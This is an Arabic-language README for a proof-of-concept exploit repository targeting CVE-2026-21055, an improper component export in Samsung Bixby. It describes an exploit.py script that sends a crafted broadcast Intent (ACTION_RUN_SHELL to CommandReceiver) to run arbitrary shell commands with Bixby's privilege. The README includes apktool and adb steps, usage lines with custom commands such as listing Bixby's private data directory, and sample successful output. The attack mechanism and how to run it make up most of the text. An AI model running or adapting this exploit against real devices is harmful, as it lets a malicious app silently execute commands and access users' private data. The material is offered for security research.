
إثبات مفهوم لاستغلال CVE-2026-21055 يوضح تنفيذ أوامر عشوائية عبر مكونات Android المصدرة بشكل غير صحيح في Samsung Bixby. يتضمن تحليل المكونات ونصوص هجوم تعتمد على Intent.
إثبات المفهوم لـ CVE-2026-21055: التصدير غير الصحيح لمكونات تطبيق أندرويد في سامسونج Bixby قبل الإصدار 4.0.70.8 يسمح للمهاجمين المحليين بتنفيذ أوامر عشوائية بامتياز Bixby.
يحتوي هذا المستودع على نصين بلغة بايثون:
analyze_components.py — يقوم بتحليل ملف AndroidManifest.xml المُفكك لتعداد الأنشطة والخدمات والمستقبلات والموفّرين المُصدرة. يُعلم المكونات المُصدرة دون حراس إذن.
exploit.py — يوضح الهجوم القائم على Intent عن طريق إرسال Intent بث مُصنّع إلى مستقبل الأوامر المُصدر لـ Bixby عبر adb shell am، وتنفيذ أمر بامتيازات نظام Bixby.
| الحقل | القيمة |
|---|---|
| معرف CVE | CVE-2026-21055 |
| Samsung SVE | SVE-2026-0917 |
| CVSS v4.0 | 8.5 — عالي |
| CWE | CWE-926 — تصدير غير صحيح لمكونات تطبيق أندرويد |
| التطبيق المتأثر | Samsung Bixby (com.samsung.android.bixby.agent) |
| الإصدارات المتأثرة | < 4.0.70.8 |
| الإصدار المُصلح | 4.0.70.8 |
| ناقل الهجوم | محلي (تطبيق ضار على نفس الجهاز) |
| الامتيازات المطلوبة | لا شيء |
| تفاعل المستخدم | لا شيء |
| التأثير | تنفيذ أوامر عشوائية بامتياز Bixby |
اسحب APK لـ Bixby من الجهاز وقم بفك التجميع:
# Find Bixby's APK path
$ adb shell pm path com.samsung.android.bixby.agent
# Pull the APK
$ adb pull <apk_path> bixby.apk
# Decompile with apktool
$ apktool d bixby.apk -o bixby_decompiled -f
شغّل نص التحليل:
$ python3 analyze_components.py --manifest bixby_decompiled/AndroidManifest.xml
أو دع النص يفك التجميع تلقائياً:
$ python3 analyze_components.py --apk bixby.apk
$ python3 exploit.py --list
# Default: execute 'id' command
$ python3 exploit.py
# Custom command
$ python3 exploit.py --command "ls /data/data/com.samsung.android.bixby.agent/"
# Specify a custom component (if auto-detection fails)
$ python3 exploit.py --component com.samsung.android.bixby.agent/.receiver.CommandReceiver
============================================================
CVE-2026-21055 PoC — Samsung Bixby Command Execution
Improper Export of Android Application Components
============================================================
[*] Target package: com.samsung.android.bixby.agent
[*] Bixby version: 4.0.69.2
[*] Vulnerable: YES (< 4.0.70.8)
[*] Bixby UID on this device: 10xxx
[*] Executing exploit...
[*] Crafting exploit Intent...
Component: com.samsung.android.bixby.agent/.receiver.CommandReceiver
Action: com.samsung.android.bixby.agent.ACTION_RUN_SHELL
Command: id
Output: /data/local/tmp/bixby_poc_output
[+] Intent sent.
[+] Command output (executed with Bixby privilege):
uid=10xxx(u0_aXXX) gid=10xxx(u0_aXXX) groups=10xxx(u0_aXXX),3003(inet),9997(everybody)
[+] EXPLOIT SUCCESSFUL — command executed with Bixby privilege
[+] Verify the output UID matches Bixby's UID: 10xxx
تصدير المكونات: يقوم Bixby بتصدير مكون واحد أو أكثر (خدمات/مستقبلات) تتعامل مع تنفيذ الأوامر أو محفزات الأتمتة. يتم تصدير هذه المكونات مع android:exported="true" ولكن بدون سمة android:permission أو فحوصات الإذن عند التشغيل.
توصيل Intent: يمكن لأي تطبيق على الجهاز إرسال Intent إلى هذه المكونات المُصدرة. يحمل Intent سلسلة إجراء (مثل ACTION_RUN_SHELL) وإضافات نصية تحتوي على الأمر المراد تنفيذه ومسار ملف الإخراج.
تنفيذ الأمر: يتلقى المكون المُصدر لـ Bixby Intent، ويستخرج الأمر، وينفذه عبر Runtime.exec() أو آلية مشابهة. يعمل الأمر في سياق عملية Bixby، ويرث جميع امتيازات نظام Bixby.
لا تفاعل مستخدم: لا يتطلب الاستغلال أي تفاعل من المستخدم. يرسل التطبيق الضار Intent بصمت في الخلفية.
هذا الدليل التجريبي (PoC) مقدم للأغراض التعليمية والبحث الأمني فقط. اختبر فقط على الأجهزة التي تمتلكها أو لديك إذن صريح لاختبارها. لا تستخدم هذا الاستغلال ضد الأجهزة دون موافقة المالك.